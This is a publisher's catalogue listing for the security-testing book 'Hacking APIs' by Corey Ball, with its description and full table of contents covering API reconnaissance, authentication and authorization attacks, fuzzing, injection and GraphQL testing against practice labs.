Hacking APIs

Hacking APIs

by Corey Ball
Released July 2022
Publisher(s): No Starch Press
ISBN: 9781718502444

Read it now on the O’Reilly learning platform with a 10-day free trial.

O’Reilly members get unlimited access to books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.

Start your free trial

Book description

An Application Programming Interface (API) is a software connection that allows applications to communicate and share services. Hacking APIs will teach you how to test web APIs for security vulnerabilities. You’ll learn how the common API types, REST, SOAP, and GraphQL, work in the wild. Then you’ll set up a streamlined API testing lab and perform common attacks, like those targeting an API’s authentication mechanisms, and the injection vulnerabilities commonly found in web applications. In the book’s guided labs, which target intentionally vulnerable APIs, you’ll practice:

•Enumerating API users and endpoints using fuzzing techniques
•Using Postman to discover an excessive data exposure vulnerability
•Performing a JSON Web Token attack against an API authentication process
•Combining multiple API attack techniques to perform a NoSQL injection
•Attacking a GraphQL API to uncover a broken object level authorization vulnerability

By the end of the book, you’ll be prepared to uncover those high-payout API bugs that other hackers aren’t finding, and improve the security of applications on the web.

Table of contents

  1. Praise for Hacking APIs
  2. Title Page
  3. Copyright
  4. Dedication
  5. About the Author
  6. Foreword
  7. Acknowledgments
  8. Introduction
    1. The Allure of Hacking Web APIs
    2. This Book’s Approach
    3. Hacking the API Restaurant
  9. Part I: How Web API Security Works
    1. Chapter 0: Preparing for Your Security Tests
      1. Receiving Authorization
      2. Threat Modeling an API Test
      3. Which API Features You Should Test
        1. API Authenticated Testing
        2. Web Application Firewalls
        3. Mobile Application Testing
        4. Auditing API Documentation
        5. Rate Limit Testing
      4. Restrictions and Exclusions
        1. Security Testing Cloud APIs
        2. DoS Testing
      5. Reporting and Remediation Testing
      6. A Note on Bug Bounty Scope
      7. Summary
    2. Chapter 1: How Web Applications Work
      1. Web App Basics
        1. The URL
        2. HTTP Requests
        3. HTTP Responses
        4. HTTP Status Codes
        5. HTTP Methods
        6. Stateful and Stateless HTTP
      2. Web Server Databases
        1. SQL
        2. NoSQL
      3. How APIs Fit into the Picture
      4. Summary
    3. Chapter 2: The Anatomy of Web APIs
      1. How Web APIs Work
      2. Standard Web API Types
        1. RESTful APIs
        2. GraphQL
      3. REST API Specifications
      4. API Data Interchange Formats
        1. JSON
        2. XML
        3. YAML
      5. API Authentication
        1. Basic Authentication
        2. API Keys
        3. JSON Web Tokens
        4. HMAC
        5. OAuth 2.0
        6. No Authentication
      6. APIs in Action: Exploring Twitter’s API
      7. Summary
    4. Chapter 3: Common API Vulnerabilities
      1. Information Disclosure
      2. Broken Object Level Authorization
      3. Broken User Authentication
      4. Excessive Data Exposure
      5. Lack of Resources and Rate Limiting
      6. Broken Function Level Authorization
      7. Mass Assignment
      8. Security Misconfigurations
      9. Injections
      10. Improper Assets Management
      11. Business Logic Vulnerabilities
      12. Summary
  10. Part II: Building an API Testing Lab
    1. Chapter 4: Your API Hacking System
      1. Kali Linux
      2. Analyzing Web Apps with DevTools
      3. Capturing and Modifying Requests with Burp Suite
        1. Setting Up FoxyProxy
        2. Adding the Burp Suite Certificate
        3. Navigating Burp Suite
        4. Intercepting Traffic
        5. Altering Requests with Intruder
      4. Crafting API Requests in Postman, an API Browser
        1. The Request Builder
        2. Environments
        3. Collections
        4. The Collection Runner
        5. Code Snippets
        6. The Tests Panel
      5. Configuring Postman to Work with Burp Suite
      6. Supplemental Tools
        1. Performing Reconnaissance with OWASP Amass
        2. Discovering API Endpoints with Kiterunner
        3. Scanning for Vulnerabilities with Nikto
        4. Scanning for Vulnerabilities with OWASP ZAP
        5. Fuzzing with Wfuzz
        6. Discovering HTTP Parameters with Arjun
      7. Summary
      8. Lab #1: Enumerating the User Accounts in a REST API
    2. Chapter 5: Setting Up Vulnerable API Targets
      1. Creating a Linux Host
      2. Installing Docker and Docker Compose
      3. Installing Vulnerable Applications
        1. The completely ridiculous API (crAPI)
        2. OWASP DevSlop’s Pixi
        3. OWASP Juice Shop
        4. Damn Vulnerable GraphQL Application
      4. Adding Other Vulnerable Apps
      5. Hacking APIs on TryHackMe and HackTheBox
      6. Summary
      7. Lab #2: Finding Your Vulnerable APIs
  11. Part III: Attacking APIs
    1. Chapter 6: Discovery
      1. Passive Recon
        1. The Passive Recon Process
        2. Google Hacking
        3. ProgrammableWeb’s API Search Directory
        4. Shodan
        5. OWASP Amass
        6. Exposed Information on GitHub
      2. Active Recon
        1. The Active Recon Process
        2. Baseline Scanning with Nmap
        3. Finding Hidden Paths in Robots.txt
        4. Finding Sensitive Information with Chrome DevTools
        5. Validating APIs with Burp Suite
        6. Crawling URIs with OWASP ZAP
        7. Brute-Forcing URIs with Gobuster
        8. Discovering API Content with Kiterunner
      3. Summary
      4. Lab #3: Performing Active Recon for a Black Box Test
    2. Chapter 7: Endpoint Analysis
      1. Finding Request Information
        1. Finding Information in Documentation
        2. Importing API Specifications
        3. Reverse Engineering APIs
      2. Adding API Authentication Requirements to Postman
      3. Analyzing Functionality
        1. Testing Intended Use
        2. Performing Privileged Actions
        3. Analyzing API Responses
      4. Finding Information Disclosures
      5. Finding Security Misconfigurations
        1. Verbose Errors
        2. Poor Transit Encryption
        3. Problematic Configurations
      6. Finding Excessive Data Exposures
      7. Finding Business Logic Flaws
      8. Summary
      9. Lab #4: Building a crAPI Collection and Discovering Excessive Data Exposure
    3. Chapter 8: Attacking Authentication
      1. Classic Authentication Attacks
        1. Password Brute-Force Attacks
        2. Password Reset and Multifactor Authentication Brute-Force Attacks
        3. Password Spraying
        4. Including Base64 Authentication in Brute-Force Attacks
      2. Forging Tokens
        1. Manual Load Analysis
        2. Live Token Capture Analysis
        3. Brute-Forcing Predictable Tokens
      3. JSON Web Token Abuse
        1. Recognizing and Analyzing JWTs
        2. The None Attack
        3. The Algorithm Switch Attack
        4. The JWT Crack Attack
      4. Summary
      5. Lab #5: Cracking a crAPI JWT Signature
    4. Chapter 9: Fuzzing
      1. Effective Fuzzing
        1. Choosing Fuzzing Payloads
        2. Detecting Anomalies
      2. Fuzzing Wide and Deep
        1. Fuzzing Wide with Postman
        2. Fuzzing Deep with Burp Suite
        3. Fuzzing Deep with Wfuzz
        4. Fuzzing Wide for Improper Assets Management
      3. Testing Request Methods with Wfuzz
      4. Fuzzing “Deeper” to Bypass Input Sanitization
      5. Fuzzing for Directory Traversal
      6. Summary
      7. Lab #6: Fuzzing for Improper Assets Management Vulnerabilities
    5. Chapter 10: Exploiting Authorization
      1. Finding BOLAs
        1. Locating Resource IDs
        2. A-B Testing for BOLA
        3. Side-Channel BOLA
      2. Finding BFLAs
        1. A-B-A Testing for BFLA
        2. Testing for BFLA in Postman
      3. Authorization Hacking Tips
        1. Postman’s Collection Variables
        2. Burp Suite Match and Replace
      4. Summary
      5. Lab #7: Finding Another User’s Vehicle Location
    6. Chapter 11: Mass Assignment
      1. Finding Mass Assignment Targets
        1. Account Registration
        2. Unauthorized Access to Organizations
      2. Finding Mass Assignment Variables
        1. Finding Variables in Documentation
        2. Fuzzing Unknown Variables
        3. Blind Mass Assignment Attacks
      3. Automating Mass Assignment Attacks with Arjun and Burp Suite Intruder
      4. Combining BFLA and Mass Assignment
      5. Summary
      6. Lab #8: Changing the Price of Items in an Online Store
    7. Chapter 12: Injection
      1. Discovering Injection Vulnerabilities
      2. Cross-Site Scripting (XSS)
      3. Cross-API Scripting (XAS)
      4. SQL Injection
        1. Manually Submitting Metacharacters
        2. SQLmap
      5. NoSQL Injection
      6. Operating System Command Injection
      7. Summary
      8. Lab #9: Faking Coupons Using NoSQL Injection
  12. Part IV: Real-World API Hacking
    1. Chapter 13: Applying Evasive Techniques and Rate Limit Testing
      1. Evading API Security Controls
        1. How Security Controls Work
        2. API Security Control Detection
        3. Using Burner Accounts
        4. Evasive Techniques
        5. Automating Evasion with Burp Suite
        6. Automating Evasion with Wfuzz
      2. Testing Rate Limits
        1. A Note on Lax Rate Limits
        2. Path Bypass
        3. Origin Header Spoofing
        4. Rotating IP Addresses in Burp Suite
      3. Summary
    2. Chapter 14: Attacking GraphQL
      1. GraphQL Requests and IDEs
      2. Active Reconnaissance
        1. Scanning
        2. Viewing DVGA in a Browser
        3. Using DevTools
      3. Reverse Engineering the GraphQL API
        1. Directory Brute-Forcing for the GraphQL Endpoint
        2. Cookie Tampering to Enable the GraphiQL IDE
        3. Reverse Engineering the GraphQL Requests
        4. Reverse Engineering a GraphQL Collection Using Introspection
      4. GraphQL API Analysis
        1. Crafting Requests Using the GraphiQL Documentation Explorer
        2. Using the InQL Burp Extension
      5. Fuzzing for Command Injection
      6. Summary
    3. Chapter 15: Data Breaches and Bug Bounties
      1. The Breaches
        1. Peloton
        2. USPS Informed Visibility API
        3. T-Mobile API Breach
      2. The Bounties
        1. The Price of Good API Keys
        2. Private API Authorization Issues
        3. Starbucks: The Breach That Never Was
        4. An Instagram GraphQL BOLA
      3. Summary
  13. Conclusion
  14. Appendix A: API Hacking Checklist
  15. Appendix B: Additional Resources
    1. Chapter 0: Preparing for Your Security Tests
    2. Chapter 1: How Web Applications Work
    3. Chapter 2: The Anatomy of Web APIs
    4. Chapter 3: Common API Vulnerabilities
    5. Chapter 4: Your API Hacking System
    6. Chapter 5: Setting Up Vulnerable API Targets
    7. Chapter 6: Discovery
    8. Chapter 7: Endpoint Analysis
    9. Chapter 8: Attacking Authentication
    10. Chapter 9: Fuzzing
    11. Chapter 10: Exploiting Authorization
    12. Chapter 11: Mass Assignment
    13. Chapter 12: Injection
    14. Chapter 13: Applying Evasive Techniques and Rate Limit Testing
    15. Chapter 14: Attacking GraphQL
    16. Chapter 15: Data Breaches and Bug Bounties
  16. Index

Product information

  • Title: Hacking APIs
  • Author(s): Corey Ball
  • Release date: July 2022
  • Publisher(s): No Starch Press
  • ISBN: 9781718502444